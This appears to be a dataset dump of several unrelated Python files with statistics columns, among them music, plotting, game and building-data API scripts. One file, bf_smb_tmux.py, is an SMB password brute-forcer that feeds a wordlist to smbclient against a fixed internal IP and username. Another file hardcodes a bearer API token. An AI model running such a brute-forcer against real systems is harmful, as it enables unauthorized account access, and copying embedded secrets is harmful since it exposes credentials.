print('Meerkat can successfully see message pangolin deleted as non-deleted') | 50 | 115 | 0.763438 | 445 | 3,200 | 5.355056 | 0.202247 | 0.044062 | 0.055812 | 0.038607 | 0.345363 | 0.266051 | 0.219052 | 0.187998 | 0.145195 | 0.145195 | 0 | 0.015647 | 0.10125 | 3,200 | 64 | 116 | 50 | 0.812935 | 0 | 0 | 0.163636 | 0 | 0 | 0.413933 | 0.010622 | 0 | 0 | 0 | 0 | 0.309091 | 1 | 0 | false | 0.127273 | 0.018182 | 0 | 0.018182 | 0.272727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
3808406b3ee798849fbc2399203409d6b196a582 | 1,503 | py | Python | server/tree_gen/tree_gen.py | patrickferner/Lo-Finity | 406531106277c2ad3422518e8beb39b1c3fa53f3 | [
"MIT"
] | 1 | 2021-06-14T14:41:36.000Z | 2021-06-14T14:41:36.000Z | server/tree_gen/tree_gen.py | Jorbeatz/Lo-Finity | 406531106277c2ad3422518e8beb39b1c3fa53f3 | [
"MIT"
] | null | null | null | server/tree_gen/tree_gen.py | Jorbeatz/Lo-Finity | 406531106277c2ad3422518e8beb39b1c3fa53f3 | [
"MIT"
] | 1 | 2019-07-22T21:45:10.000Z | 2019-07-22T21:45:10.000Z | import requests
import json
import pdb
import time
#url_string = "https://api.hooktheory.com/v1/trends/nodes?cp=1"
response = requests.get("https://api.hooktheory.com/v1/trends/nodes?cp=1", headers={'Authorization': "Bearer 0449bff346d2609ac119bfb7d290e9bb"})
hook_result = json.loads(response.text)
json_result = {}
chord_ID = "1"
json_result[1] = {"prob": [], "child": []}
d_limit = 4
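# Recursively build a chord-progression tree from the Hooktheory trends API:
# each node keeps the top-4 transition probabilities ("prob") and their
# child chords ("child"), stopping at the tonic ('1') or at depth d_limit.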
def build_json(current, depth, url_string):
# if depth is d_limit:
# return
global chord_ID
global hook_result
global response
index = 0
if depth != 0:
url_string = url_string + "," + chord_ID
print(url_string)
response = requests.get(url_string, headers={'Authorization': "Bearer 0449bff346d2609ac119bfb7d290e9bb"})
hook_result = json.loads(response.text)
time.sleep(2)
print("Called API Depth " + str(depth))
for obj in hook_result[:4]:
probability = obj["probability"]
chord_ID = obj["chord_ID"].encode("ascii")
current["prob"].append(probability)
current["child"].append({chord_ID: {}})
        if chord_ID == '1' or depth == d_limit:
return
current["child"][index][chord_ID] = {"prob": [], "child": []}
build_json(current["child"][index][chord_ID], depth+1, url_string)
index += 1
current = json_result[1]
build_json(current, 0, 'https://api.hooktheory.com/v1/trends/nodes?cp=1')
print(json_result)
with open('chord_tree.json', 'w') as outfile:
json.dump(json_result, outfile) | 28.903846 | 144 | 0.667332 | 202 | 1,503 | 4.806931 | 0.311881 | 0.064882 | 0.055613 | 0.064882 | 0.3862 | 0.297631 | 0.297631 | 0.297631 | 0.297631 | 0.183316 | 0 | 0.045603 | 0.182967 | 1,503 | 52 | 145 | 28.903846 | 0.745114 | 0.05988 | 0 | 0.054054 | 0 | 0 | 0.209072 | 0.045358 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.108108 | null | null | 0.081081 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
380d0996fe02d82d90603eefc1f9b3eea03168d3 | 666 | py | Python | examples/hover_example.py | kail85/mpldatacursor | 2df44a3912c2684b2d66fadc7cacbb9f60a15186 | [
"MIT"
] | 165 | 2015-01-09T03:48:50.000Z | 2022-03-16T03:25:23.000Z | examples/hover_example.py | kail85/mpldatacursor | 2df44a3912c2684b2d66fadc7cacbb9f60a15186 | [
"MIT"
] | 87 | 2015-02-09T11:17:49.000Z | 2022-01-04T02:48:00.000Z | examples/hover_example.py | kail85/mpldatacursor | 2df44a3912c2684b2d66fadc7cacbb9f60a15186 | [
"MIT"
] | 46 | 2015-01-13T00:59:18.000Z | 2022-03-03T12:46:40.000Z | """
Demonstrates the hover functionality of mpldatacursor as well as point labels
and a custom formatting function. Notice that overlapping points have both
labels displayed.
"""
import string
import matplotlib.pyplot as plt
import numpy as np
from mpldatacursor import datacursor
np.random.seed(1977)
x, y = np.random.random((2, 26))
labels = string.ascii_lowercase
fig, ax = plt.subplots()
ax.scatter(x, y, s=200)
ax.set_title('Mouse over a point')
# Show only the point label and allow nicer formatting if points overlap
formatter = lambda **kwargs: ', '.join(kwargs['point_label'])
datacursor(hover=True, formatter=formatter, point_labels=labels)
plt.show()
| 27.75 | 77 | 0.771772 | 100 | 666 | 5.1 | 0.62 | 0.043137 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017271 | 0.130631 | 666 | 23 | 78 | 28.956522 | 0.863558 | 0.363363 | 0 | 0 | 0 | 0 | 0.074519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
38188123fc74067b2382c0edf77f410238662bfd | 1,040 | py | Python | bf_smb_tmux.py | BadNameException/SambaBF | 7421ac1d821807ffc565b7b5b466c85084343fb9 | [
"MIT"
] | null | null | null | bf_smb_tmux.py | BadNameException/SambaBF | 7421ac1d821807ffc565b7b5b466c85084343fb9 | [
"MIT"
] | null | null | null | bf_smb_tmux.py | BadNameException/SambaBF | 7421ac1d821807ffc565b7b5b466c85084343fb9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
from subprocess import Popen, PIPE, check_output
p = 1
USERNAME = "sigurdkb"
IP = "172.16.0.30"
PORT = "445"
new_results = []
correct_pw = ""
cracked = bool(False)
counter = 0
guess_result = ((),)
pw = ''
def connect_smb():
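    # Pipe an smbclient command into a bash subprocess for each wordlist
    # candidate; a b'Welcome' banner in the output marks a valid password.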
global correct_pw
global cracked
global guess_result
global pw
while cracked == False:
pw = get_next_pw()
arg = 'smbclient //'+IP+'/homes -U '+USERNAME+' '+pw
proc = Popen('/bin/bash', stdin=PIPE, stdout=PIPE)
        stdout, _ = proc.communicate(arg.encode())
        guess_result = stdout
print ("Try: " + pw )
if b'Welcome' in guess_result:
print ("Correct password: " + pw)
correct_pw = pw
f = open("correct_pw.txt", 'w')
f.write(correct_pw)
cracked = True
else:
print ("Tried: " + pw)
def get_next_pw():
    global counter
    with open("wl.txt", 'r') as f:
        lines = f.readlines()
    if counter >= len(lines):
        print("wl.txt is finished")
        exit(0)
    # Keep the original 'f' prefix applied to every candidate.
    l = 'f' + lines[counter]
    counter += 1
    return l.strip('\n')
| 17.931034 | 54 | 0.626923 | 152 | 1,040 | 4.171053 | 0.532895 | 0.070978 | 0.050473 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019417 | 0.207692 | 1,040 | 57 | 55 | 18.245614 | 0.75 | 0.031731 | 0 | 0.045455 | 0 | 0 | 0.138308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.022727 | 0.022727 | null | null | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
381c5c0ab457121c1be3d4dc192a40949d85e8c1 | 1,378 | py | Python | isdbeads/__init__.py | michaelhabeck/bayesian-random-tomography | 9429a3688df368f0fe8fd7beaa8202386951164a | [
"MIT"
] | 2 | 2021-04-17T14:05:05.000Z | 2022-02-24T16:03:29.000Z | isdbeads/__init__.py | michaelhabeck/bayesian-random-tomography | 9429a3688df368f0fe8fd7beaa8202386951164a | [
"MIT"
] | null | null | null | isdbeads/__init__.py | michaelhabeck/bayesian-random-tomography | 9429a3688df368f0fe8fd7beaa8202386951164a | [
"MIT"
] | null | null | null | from .universe import (
Universe,
Particle
)
from .probability import (
Probability
)
from .likelihood import (
Likelihood,
Normal,
Exponential,
LowerUpper,
Logistic,
GaussianMixture,
Relu
)
from .model import (
ModelDistances,
ModelImage,
ModelVolume,
RadiusOfGyration,
ProjectedCloud,
ModelFactory
)
from .grid import (
Grid
)
from .params import (
Volume,
Image,
Parameters,
Forces,
Location,
Precision,
Scale,
Coordinates,
Distances,
Rotation
)
from .prior import (
BoltzmannEnsemble,
TsallisEnsemble
)
from .forcefield import (
ForcefieldFactory
)
from .nblist import (
NBList
)
from .posterior import (
ConditionalPosterior,
PosteriorCoordinates
)
from .data import (
HiCData,
HiCParser
)
from .mcmc import (
RandomWalk,
AdaptiveWalk,
Ensemble
)
from .hmc import (
HamiltonianMonteCarlo
)
from .rex import (
ReplicaExchange,
ReplicaHistory,
ReplicaState
)
from .core import (
take_time
)
from .utils import (
rdf,
crosscorr,
image_center,
ChainViewer,
create_universe,
random_sphere,
segment_structure
)
from .chromosome import (
ChromosomeSimulation
)
from .inference import (
AdaptiveWalk,
RotationSampler,
HamiltonianMonteCarlo
)
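
# Note: AdaptiveWalk and HamiltonianMonteCarlo are re-exported from
# .inference here, shadowing the earlier imports from .mcmc and .hmc.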
| 12.759259 | 26 | 0.656749 | 113 | 1,378 | 7.964602 | 0.619469 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.277939 | 1,378 | 107 | 27 | 12.878505 | 0.904523 | 0 | 0 | 0.044444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3820fe50d4dce95d717e614296b340c0f9ebd66c | 1,294 | py | Python | gui/Color.py | brianjimenez/emol | b789b85b40a99247f008fb7cafa0d019d142cd3c | [
"MIT"
] | null | null | null | gui/Color.py | brianjimenez/emol | b789b85b40a99247f008fb7cafa0d019d142cd3c | [
"MIT"
] | null | null | null | gui/Color.py | brianjimenez/emol | b789b85b40a99247f008fb7cafa0d019d142cd3c | [
"MIT"
] | null | null | null | '''
Created on Oct 10, 2012
@author: Brian Jimenez-Garcia
@contact: brian.jimenez@bsc.es
'''
class Color:

    def __init__(self, red=0., green=0., blue=0., alpha=1.0):
        self.__red = red
        self.__green = green
        self.__blue = blue
        self.__alpha = alpha

    def get_rgba(self):
        return self.__red, self.__green, self.__blue, self.__alpha

    def get_red(self):
        return self.__red

    def get_blue(self):
        return self.__blue

    def get_green(self):
        return self.__green

    def get_alpha(self):
        return self.__alpha
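
# Usage sketch (illustrative, not in the original): get_rgba() unpacks
# directly into RGBA-taking calls, e.g. with a PyOpenGL-style binding:
#     glColor4f(*Sky.get_rgba())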
# Useful predefined colors
White = Color(1.0, 1.0, 1.0, 1.0)
Black = Color(0.0, 0.0, 0.0, 1.0)
Carbon = Color(0.17, 0.17, 0.18, 1.0)
Red = Color(0.95, 0.03, 0.01, 1.0)
Blue = Color(0.01, 0.03, 0.95, 1.0)
Sky = Color(0.233, 0.686, 1.0, 1.0)
Yellow = Color(1.0, 1.0, 0.0, 1.0)
Green = Color(0.0, 0.53, 0.0, 1.0)
Pink = Color(0.53, 0.12, 0.36, 1.0)
DarkRed = Color(0.59, 0.13, 0.0, 1.0)
Violet = Color(0.46, 0.0, 1.0, 1.0)
DarkViolet = Color(0.39, 0.0, 0.73, 1.0)
Cyan = Color(0.0, 1.0, 1.0, 1.0)
Orange = Color(1.0, 0.59, 0.0, 1.0)
Peach = Color(1.0, 0.66, 0.46, 1.0)
DarkGreen = Color(0.0, 0.46, 0.0, 1.0)
Gray = Color(0.59, 0.59, 0.59, 1.0)
DarkOrange = Color(0.86, 0.46, 0.0, 1.0) | 26.408163 | 66 | 0.578053 | 264 | 1,294 | 2.708333 | 0.231061 | 0.083916 | 0.071329 | 0.05035 | 0.090909 | 0.054545 | 0.01958 | 0 | 0 | 0 | 0 | 0.187123 | 0.231839 | 1,294 | 49 | 67 | 26.408163 | 0.532193 | 0.085781 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.176471 | false | 0 | 0 | 0.147059 | 0.352941 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
382269a9358bb58a18f501c0bd286c171e8ac7d7 | 775 | py | Python | Spell Compendium/scr/Spell1148 - Nimbus of Light.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-04-26T08:03:56.000Z | 2021-04-26T08:03:56.000Z | Spell Compendium/scr/Spell1148 - Nimbus of Light.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 2 | 2021-06-11T05:55:01.000Z | 2021-08-03T23:41:02.000Z | Spell Compendium/scr/Spell1148 - Nimbus of Light.py | Sagenlicht/ToEE_Mods | a4b07f300df6067f834e09fcbc4c788f1f4e417b | [
"MIT"
] | 1 | 2021-05-17T15:37:58.000Z | 2021-05-17T15:37:58.000Z | from toee import *
def OnBeginSpellCast(spell):
    print "Nimbus of Light OnBeginSpellCast"
    print "spell.target_list=", spell.target_list
    print "spell.caster=", spell.caster, " caster.level= ", spell.caster_level

def OnSpellEffect(spell):
    print "Nimbus of Light OnSpellEffect"
    spell.duration = 10 * spell.caster_level
    spellTarget = spell.target_list[0]
    spellTarget.obj.condition_add_with_args('sp-Nimbus of Light', spell.id, spell.duration, 0, 0)  # 3rd arg = roundsCharged; 4th arg = attack_hit_status
    spellTarget.partsys_id = game.particles('sp-Heroism', spellTarget.obj)
    spell.spell_end(spell.id)

def OnBeginRound(spell):
    print "Nimbus of Light OnBeginRound"

def OnEndSpellCast(spell):
    print "Nimbus of Light OnEndSpellCast"
| 31 | 151 | 0.740645 | 101 | 775 | 5.564356 | 0.39604 | 0.071174 | 0.115658 | 0.128114 | 0.163701 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01072 | 0.157419 | 775 | 24 | 152 | 32.291667 | 0.849923 | 0.067097 | 0 | 0 | 0 | 0 | 0.267684 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
38229cdc49513c553f97ed67ce3eaa6b0ba92dcb | 17,258 | py | Python | pyBAScloudAPI/examples/main.py | bascloud/BASCloudAPI | 6a06d430720e99204f84f5362b4f22d7d4a72b76 | [
"MIT"
] | 3 | 2021-04-30T07:44:11.000Z | 2021-05-03T06:35:01.000Z | pyBAScloudAPI/examples/main.py | bascloud/BASCloudAPI | 6a06d430720e99204f84f5362b4f22d7d4a72b76 | [
"MIT"
] | 9 | 2021-06-23T04:21:51.000Z | 2022-01-17T04:15:06.000Z | pyBAScloudAPI/examples/main.py | bascloud/BAScloudAPI | 6a06d430720e99204f84f5362b4f22d7d4a72b76 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import datetime
import pyBAScloudAPI as api
def printErrorHandler(exception, json):
    print("\t\tException occurred in request: ", exception, json)
print("Testing util functions.")
print("\t2021-04-26T10:56:58.000Z = ", api.Util.parseDateTimeString(dateTime="2021-04-26T10:56:58.000Z"))
assert api.Util.parseDateTimeString(dateTime="2021-04-26T10:56:58.000Z") == 1619427418
print("\tParameters:", api.Util.parseURLParameter(url="test.local/tenants/XXX/connectors/XXX/devices?page[size]=1&page[before]=Mzk5ZTM1MWYtNTI3OS00YzFhLTk0MmUtYTZiODBmMjFiYzVh"))
print("Demo of library methods for BAScloud API endpoints.")
print("Initialising library...")
BCAPI = api.EntityContext("https://basc-prd-apm-euw.azure-api.net/v2")
print("\tOK.")
print("1. - Authentication with user login")
BCAPI.authenticateWithUserLogin(email="user@example.com", password="example-password")  # placeholder credentials; use your own BAScloud account
print("\tOK.")
print("\tAuthenticated: ", BCAPI.isAuthenticated())
print("\tToken valid until: ", datetime.datetime.fromtimestamp(BCAPI.getTokenExpirationDate()))
print("\tToken: ", BCAPI.getToken())
print("2. - Access user information")
print("\tRequesting all users...")
users = BCAPI.getUsersCollection(errorHandler=printErrorHandler)
print("\t\tOK.")
print("\tFound users: ", len(users[0]))
print("\tRequesting single users with UUID...")
currentUser = BCAPI.getUser(users[0][0].uuid)
print("\t\tOK.")
print("\tUser UUID: ", currentUser.uuid)
print("\tUser Email: ", currentUser.email)
print("\tUser created at: ", datetime.datetime.fromtimestamp(currentUser.createdAt))
print("\tUser updated at: ", datetime.datetime.fromtimestamp(currentUser.updatedAt))
print("\tRequesting associated tenant...")
assoc_tenant = BCAPI.getAssociatedTenant(currentUser.uuid)
print("\t\tOK.")
print("\tTenant UUID: ", assoc_tenant.uuid)
print("3. - Access tenant information")
print("\tRequesting all tenants...")
tenants = BCAPI.getTenantsCollection()
print("\t\tOK.")
print("\tFound tenants: ", len(tenants[0]))
print("\tRequesting single tenant with UUID...")
tenant = BCAPI.getTenant(tenants[0][0].uuid)
print("\t\tOK.")
print("\tTenant UUID: ", tenant.uuid)
print("\tTenant Name: ", tenant.name)
print("\tTenant URL Name: ", tenant.urlName)
print("\tTenant created at: ", datetime.datetime.fromtimestamp(tenant.createdAt))
print("\tTenant updated at: ", datetime.datetime.fromtimestamp(tenant.updatedAt))
print("\tRequesting associated users of tenant...")
tenant_user = BCAPI.getAssociatedUsers(tenant.uuid)
print("\t\tOK.")
print("\tFound tenant users: ", len(tenant_user[0]))
# print("3.5 - Create tenant and update")
# print("\tCreating new tenant...")
# new_tenant = BCAPI.createTenant("MoritzTestTenant", currentUser.uuid);
# print("\t\tOK.")
# print("\tNew tenant UUID: ", new_tenant.uuid)
# print("\tRequesting newly created tenant with UUID...")
# new_re_tenant = BCAPI.getTenant(new_tenant.uuid);
# print("\t\tOK.")
# print("\tTenant UUID: ", new_re_tenant.uuid)
# print("\tTenant Name: ", new_re_tenant.name)
# print("\tTenant URL Name: ", new_re_tenant.urlName)
# print("\tTenant created at: ", datetime.datetime.fromtimestamp(new_re_tenant.createdAt))
# print("\tTenant updated at: ", datetime.datetime.fromtimestamp(new_re_tenant.createdAt))
# print("\tUpdating newly created tenant...")
# up_re_tenant = BCAPI.updateTenant(new_re_tenant.uuid, "MoritzTestTenant2")
# print("\t\tOK.")
# print("\tTenant Name: ", up_re_tenant.getName())
# print("\tRequesting associated users of tenant...")
# re_tenant_user = BCAPI.getAssociatedUsers(new_re_tenant.uuid)
# print("\t\tOK.")
# print("\tFound tenant users: ", len(re_tenant_user[0]))
# print("\tDeleting newly created tenant...")
# BCAPI.deleteTenant(new_re_tenant.uuid)
# print("\t\tOK.")
print("4. - Access property information")
print("\tRequesting all properties...")
props = BCAPI.getPropertiesCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound properties: ", len(props[0]))
print("\tRequesting single property with UUID...")
print("\tProperty UUID: ", props[0][0].uuid)
property = BCAPI.getProperty(tenant.uuid, props[0][0].uuid)
print("\t\tOK.")
print("\tProperty UUID: ", property.uuid)
print("\tProperty Name: ", property.name)
print("\tProperty Address: {}, {} {}, {}".format(property.street, property.postalCode, property.city, property.country))
print("\tProperty created at: ", datetime.datetime.fromtimestamp(property.createdAt))
print("\tProperty updated at: ", datetime.datetime.fromtimestamp(property.updatedAt))
print("\tRequesting associated connectors of the property...")
prop_connectors = BCAPI.getAssociatedConnectors(tenant.uuid, property.uuid)
print("\t\tOK.")
print("\tFound property connectors: ", len(prop_connectors[0]))
print("4.5 - Create property and update")
print("\tCreating new property...")
new_property = BCAPI.createProperty(tenant.uuid, "MoritzTestProperty", "Street", "12345", "City", "Country")
print("\t\tOK.")
print("\tNew property UUID: ", new_property.uuid)
print("\tRequesting newly created property with UUID...")
new_re_property = BCAPI.getProperty(tenant.uuid,new_property.uuid)
print("\t\tOK.")
print("\tProperty UUID: ", new_re_property.uuid)
print("\tProperty Name: ", new_re_property.name)
print("\tProperty Address: {}, {} {}, {}".format(new_re_property.street, new_re_property.postalCode, new_re_property.city, new_re_property.country))
print("\tProperty created at: ", datetime.datetime.fromtimestamp(new_re_property.createdAt))
print("\tProperty updated at: ", datetime.datetime.fromtimestamp(new_re_property.updatedAt))
print("\tUpdating newly created property...")
up_re_property = BCAPI.updateProperty(tenant.uuid, new_re_property.uuid, "MoritzTestProperty2")
print("\t\tOK.")
print("\tProperty Name: ", up_re_property.name)
# Should always be empty; the next section creates a new connector for it
print("\tRequesting associated connectors of the property...")
new_prop_connectors = BCAPI.getAssociatedConnectors(tenant.uuid, up_re_property.uuid)
print("\t\tOK.")
print("\tFound property connectors: ", len(new_prop_connectors[0]))
# print("\tDeleting newly created property...")
# BCAPI.deleteProperty(tenant.uuid, up_re_property.uuid)
# print("\t\tOK.")
print("5. - Access connector information")
print("\tRequesting all connectors...")
connectors = BCAPI.getConnectorsCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound connectors: ", len(connectors[0]))
print("\tRequesting single connector with UUID...")
print("\tConnector UUID: ", connectors[0][0].uuid)
connector = BCAPI.getConnector(tenant.uuid, connectors[0][0].uuid)
print("\t\tOK.")
print("\tConnector UUID: ", connector.uuid)
print("\tConnector Name: ", connector.name)
print("\tConnector created at: ", datetime.datetime.fromtimestamp(connector.createdAt))
print("\tConnector updated at: ", datetime.datetime.fromtimestamp(connector.updatedAt))
print("\tRequesting associated property of the connector again...")
conn_prop = BCAPI.getAssociatedProperty(tenant.uuid, connector.uuid)
print("\t\tOK.")
print("\tConnector's property UUID: ", conn_prop.uuid)
print("\tRequest connector's associated devices...")
max_devices = 0
for conn in connectors[0]:
    conn_devices = BCAPI.getAssociatedDevices(tenant.uuid, conn.uuid)
    if len(conn_devices[0]) > max_devices:
        max_devices = len(conn_devices[0])
        connector = conn
print("\t\tFound connector with ", max_devices, " devices")
print("5.5 - Create connector and update")
print("\tCreating new connector...")
new_connector = BCAPI.createConnector(tenant.uuid, new_property.uuid, "MoritzTestConnector")
print("\t\tOK.")
print("\tNew connector UUID: ", new_connector.uuid)
print("\tRequesting new API key for created connector...")
connectorToken = BCAPI.getNewConnectorAuthToken(tenant.uuid, new_connector.uuid)
print("\t\tOK.")
print("\tConnector Auth. Token: ", connectorToken)
print("\tRequesting newly created connector with UUID...")
new_re_connector = BCAPI.getConnector(tenant.uuid, new_connector.uuid)
print("\t\tOK.")
print("\tConnector UUID: ", new_re_connector.uuid)
print("\tConnector Name: ", new_re_connector.name)
print("\tConnector created at: ", datetime.datetime.fromtimestamp(new_re_connector.createdAt))
print("\tConnector updated at: ", datetime.datetime.fromtimestamp(new_re_connector.createdAt))
print("\tUpdating newly created connector...")
up_re_connector = BCAPI.updateConnector(tenant.uuid, new_re_connector.uuid, "MoritzTestConnector2")
print("\t\tOK.")
print("\tConnector Name: ", up_re_connector.name)
print("\tRequesting associated connectors of the new property...")
new_prop_connectors = BCAPI.getAssociatedConnectors(tenant.uuid, new_property.uuid)
print("\t\tOK.")
print("\tFound property connectors: ", len(new_prop_connectors[0]))
# print("\tDeleting newly created connector...")
# BCAPI.deleteConnector(tenant.uuid, new_connector.uuid);
# print("\t\tOK.")
# print("\tDeleting newly created property...")
# BCAPI.deleteProperty(tenant.uuid, new_property.uuid);
# print("\t\tOK.")
print("6. - Access device information")
print("\tRequesting all devices...")
devices = BCAPI.getDevicesCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound devices: ", len(devices[0]))
print("\tRequesting single device with UUID...")
print("\tDevice UUID: ", devices[0][0].uuid)
device = BCAPI.getDevice(tenant.uuid, devices[0][0].uuid)
print("\t\tOK.")
print("\tDevice UUID: ", device.uuid)
print("\tDevice AKS ID: ", device.aksID)
print("\tDevice Description: ", device.description)
print("\tDevice Unit: ", device.unit)
print("\tDevice created at: ", datetime.datetime.fromtimestamp(device.createdAt))
print("\tDevice updated at: ", datetime.datetime.fromtimestamp(device.updatedAt))
print("\tRequesting associated connector of the device again...")
device_conn = BCAPI.getAssociatedConnector(tenant.uuid, device.uuid)
print("\t\tOK.")
print("\tDevice's Connector UUID: ", device_conn.uuid)
print("\tRequesting device associated readings...")
max_readings = 0
for d in devices[0]:
    device_readings = BCAPI.getAssociatedReadings(tenant.uuid, d.uuid)
    if len(device_readings[0]) > max_readings:
        max_readings = len(device_readings[0])
        device = d
print("\t\tFound device with ", max_readings, " readings")
print("\tRequesting paginated device associated readings...")
paging = api.PagingOption(10, api.PagingOption.Direction.NONE, "")
device_readings = BCAPI.getAssociatedReadings(tenant.uuid, device.uuid, paging)
print("\t\tOK.")
print("\tFound readings: ", len(device_readings[0]))
for r in device_readings[0]:
    print("\t\tReading: ", datetime.datetime.fromtimestamp(r.timestamp), " - ", r.value)
print("\tRequesting device associated setpoints...")
max_setpoints = 0
for d in devices[0]:
    device_setpoint = BCAPI.getAssociatedSetPoints(tenant.uuid, d.uuid, paging)
    if len(device_setpoint[0]) > max_setpoints:
        max_setpoints = len(device_setpoint[0])
        device = d
print("\t\tFound device with ", max_setpoints, " setpoints")
print("\tRequesting paginated device associated setpoints...")
device_setpoint = BCAPI.getAssociatedSetPoints(tenant.uuid, device.uuid, paging)
print("\t\tOK.")
print("\tFound setpoints: ", len(device_setpoint[0]))
for sp in device_setpoint[0]:
    print("\t\tSetPoint: ", datetime.datetime.fromtimestamp(sp.timestamp), " - ", sp.value)
print("6.5 - Create device and update")
print("\tCreating new device...")
new_device = BCAPI.createDevice(tenant.uuid, new_connector.uuid, "MoritzTestAKS1000", "TestDevice", "m3")
print("\t\tOK.")
print("\tNew device UUID: ", new_device.uuid)
print("\tRequesting newly created device with UUID...")
new_re_device = BCAPI.getDevice(tenant.uuid, new_device.uuid)
print("\t\tOK.")
print("\tDevice UUID: ", new_re_device.uuid)
print("\tDevice AKS ID: ", new_re_device.aksID)
print("\tDevice Description: ", new_re_device.description)
print("\tDevice Unit: ", new_re_device.unit)
print("\tDevice created at: ", datetime.datetime.fromtimestamp(new_re_device.createdAt))
print("\tDevice updated at: ", datetime.datetime.fromtimestamp(new_re_device.updatedAt))
print("\tUpdating newly created device...")
up_re_device = BCAPI.updateDevice(tenant.uuid, new_re_device.uuid, "MoritzTestAKS1001")
print("\t\tOK.")
print("\tDevice AKS ID: ", up_re_device.aksID)
print("\tRequesting associated connector of the new device...")
new_dev_connector = BCAPI.getAssociatedConnector(tenant.uuid, up_re_device.uuid)
print("\t\tOK.")
print("\tFound device connector: ", new_dev_connector.uuid)
# print("\tDeleting newly created device...")
# BCAPI.deleteDevice(tenant.uuid, new_device.uuid)
# print("\t\tOK.")
print("7. - Access reading information")
print("\tRequesting all readings...")
readings = BCAPI.getReadingsCollection(tenant.uuid)
print("\t\tOK.")
print("\tFound readings: ", len(readings[0]))
if len(readings[0]) > 0:
    print("\tRequesting single reading with UUID...")
    print("\tReading UUID: ", readings[0][0].uuid)
    reading = BCAPI.getReading(tenant.uuid, readings[0][0].uuid)
    print("\t\tOK.")
    print("\tReading UUID: ", reading.uuid)
    print("\tReading Value: ", reading.value)
    print("\tReading timestamp: ", datetime.datetime.fromtimestamp(reading.timestamp))
    print("\tReading created at: ", datetime.datetime.fromtimestamp(reading.createdAt))
    print("\tReading updated at: ", datetime.datetime.fromtimestamp(reading.updatedAt))
    print("\tRequesting associated device of the reading again...")
    read_device = BCAPI.getAssociatedDevice(tenant.uuid, reading.uuid)
    print("\t\tOK.")
    print("\tReading's Device UUID: ", read_device.uuid)
print("8. - Create new reading")
currentDateTime = int(datetime.datetime.now().timestamp())
new_read = BCAPI.createReading(tenant.uuid, new_device.uuid, 1234.56, currentDateTime)
print("\t\tOK.")
print("\tRequesting created reading information again... ")
new_re_reading = BCAPI.getReading(tenant.uuid, new_read.uuid)
print("\t\tOK.")
print("\tReading UUID: ", new_re_reading.uuid)
print("\tReading Value: ", new_re_reading.value)
print("\tReading timestamp: ", datetime.datetime.fromtimestamp(new_re_reading.timestamp))
print("\tReading created at: ", datetime.datetime.fromtimestamp(new_re_reading.createdAt))
print("\tReading updated at: ", datetime.datetime.fromtimestamp(new_re_reading.updatedAt))
print("\tRequesting paginated device associated readings...")
new_device_readings = BCAPI.getAssociatedReadings(tenant.uuid, new_device.uuid, paging)
print("\t\tOK.")
print("\tFound readings: ", len(new_device_readings[0]))
for sp in new_device_readings[0]:
